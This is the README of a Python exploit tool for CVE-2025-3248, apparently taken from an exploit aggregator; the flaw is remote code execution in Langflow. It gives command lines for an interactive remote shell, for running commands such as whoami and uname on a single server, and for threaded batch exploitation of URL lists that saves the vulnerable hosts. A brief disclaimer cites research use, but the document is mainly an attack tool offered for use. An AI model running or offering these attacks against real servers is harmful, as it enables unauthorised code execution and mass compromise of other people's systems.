Share
## https://sploitus.com/exploit?id=0EFC6453-D6AF-5C09-9158-EDC379805FC6
# CVE-2025-3248 Langflow RCE Scanner

A Python tool designed to scan and exploit the CVE-2025-3248 vulnerability, which allows for remote code execution in the Langflow application. ## Features

- Single-target scanning and command execution
- Batch URL scanning
- Interactive shell mode
- Multithreaded batch processing
- Detailed output and error handling
- Results saved to files

## Installation Requirements

```bash
pip install requests
```

## Usage

### Single-target Scanning (Entering Interactive Shell)
```bash
python cve-2025-3248.py http://target:port
```

### Single-target Command Execution
```bash
python cve-2025-3248.py http://target:port -c "id"
```

### Batch Scanning
```bash
python cve-2025-3248.py -f urls.txt
```

### Batch Command Execution
```bash
python cve-2025-3248.py -f urls.txt -c "whoami"
```

### Advanced Options
```bash
python cve-2025-3248.py -f urls.txt -t 20 --timeout 15 -v
```

## Parameter Descriptions

- `url`: Target URL (e.g., http://10.10.10.1:7860)
- `-f, --file`: File containing a list of URLs, one URL per line
- `-c, --cmd`: Command to execute (e.g., id, whoami)
- `--timeout`: Request timeout, default 10 seconds
- `-t, --threads`: Number of threads for batch scanning, default 10
- `-v, --verbose`: Verbose mode, displaying original responses

## Examples

### Example 1: Single-target Scanning
```bash
python cve-2025-3248.py http://192.168.1.100:7860
```

### Example 2: Executing a Specific Command
```bash
python cve-2025-3248.py http://192.168.1.100:7860 -c "ls -la"
```

### Example 3: Batch Scanning Multiple Targets
Create a file `targets.txt` with the following entries:
```
http://192.168.1.100:7860
http://192.168.1.101:7860
http://192.168.1.102:7860
```

Then run:
```bash
python cve-2025-3248.py -f targets.txt
```

### Example 4: Batch Executing Commands
```bash
python cve-2025-3248.py -f targets.txt -c "uname -a" -t 5
```

## Output Description

- `[+]` Successfully executed
- `[-]` Failed or error
- `[!]` Warning messages
- `[*]` Information output

## Result Files

Scanned targets are saved to `vulnerable_targets.txt` or `vulnerable_targets_{command}.txt` files. ## Disclaimer

This tool is used solely for security research and educational purposes. Users are responsible for their use. Testing systems without authorization may violate laws and regulations. ## Author

- **bambooqj**
- GitHub: [github.com/bambooqj](https://github.com/bambooqj)

## References

- CVE-2025-3248
- Reference implementation: [ynsmroztas/CVE-2025-3248-Langflow-RCE](https://github.com/ynsmroztas/CVE-2025-3248-Langflow-RCE)